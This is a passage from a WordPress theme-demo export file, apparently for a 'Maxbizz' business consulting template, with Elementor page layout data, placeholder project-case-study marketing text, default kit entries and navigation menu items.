		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-1-project.png" alt="" loading="lazy" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1050</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:52:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:52:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[mb-project-single]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="elementor_library_type" nicename="page"><![CDATA[page]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4f485cbd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"16cddd65","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"3a4e789","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1ec5aac2","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"2b13e690","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"339d13f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5889fd7c","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"10dcad63","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53d5271c","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5dcaf7e2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"4b3ecf7a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"12cac18e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6e41b761","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1ccebcb3","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c6af9ae","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2ea1549b","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2bb4ff92","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"40167225","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7125fb7b","elType":"section","settings":[],"elements":[{"id":"2292e976","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"74a4f2ef","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b6408db","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a6fb144","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4359b052","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5695beea","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d323896","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6c607602","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"524b70b7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7a5ae6ff","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2bf4429e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"79862618","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"255cbb6f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d7135a4","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"38949894","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7af2ac6e","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"22153473","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2b9fdc68","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2a136c0a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"199198b4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"66dcf71a","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"18b9835e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5aa06968","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4283666a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=default-kit-2-2</link>
		<pubDate>Thu, 03 Sep 2020 08:41:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1290</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:41:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:41:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=default-kit-2</link>
		<pubDate>Mon, 19 Oct 2020 03:06:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1431</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 03:06:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 03:06:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Pages</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pages/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/pages/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1433</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pages]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>2</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1433]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1537/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1537/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1537</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1537]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>3</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1433]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[487]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1538/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1538/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1538</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1538]]></wp:post_name>
